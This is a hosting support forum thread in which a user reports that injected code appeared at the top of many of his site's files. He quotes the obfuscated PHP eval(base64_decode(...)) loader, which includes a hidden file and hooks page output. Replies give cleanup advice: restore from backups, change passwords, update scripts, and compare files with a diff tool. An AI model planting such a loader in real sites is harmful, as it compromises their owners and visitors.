Jump to content
Sign in to follow this  
slick

Code Being Inserted Into My Files

Recommended Posts

Several files on my hosting account have been edited without my permission.

Some code has been inserted at the top.

 

><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3RyaW5pdGsvcHVibGljX2h0bWwvdjEvbW9kdWxlcy9Gb3J1bXMvdGVtcGxhdGVzL3N1YlNpbHZlci9pbWFnZXMvbGFuZ19lbmdsaXNoL2NvcHBlci5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

 

The file permission is 644.

I don't understand how this could happen but it's like almost half the files on my account have been hacked.

 

Is there any easy way to change them back to how they were before?

 

The attack occured on December 17th 2009.

21:00 server time.

Edited by slick

Share this post


Link to post
Share on other sites

You will need to submit a ticket with the help desk and

 

1) ask them to check if the account have been comprimised. Link on top of page and in my signature.

 

2) ask them if they have backups to replace the hacked files with (unless you have backups, which is your responsibility to have).

 

3) then change passwords (cpanel,database,emails), and make sure every script etc you use are of the most recent and secure version.

Share this post


Link to post
Share on other sites

if you're using outdated version of some script, restoring your files won't be of much help. such hacks are usually done automatically once your site is known to be hackable. this exact thing happened to me long time ago when I was using outdated version of WordPress. only upgrade will keep you relatively save.

 

Is there any easy way to change them back to how they were before?

not if you don't have the originals. if you do, though, use something like WinMerge to compare the current and the originals to find the differences. make sure that you not only check the files, but the contents of the directories! make sure there are no new files on your site.

 

if TCH backups are not far back enough, and you're are using opensource script, you'll most likely be able to download original copy of the version of the script you're using.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...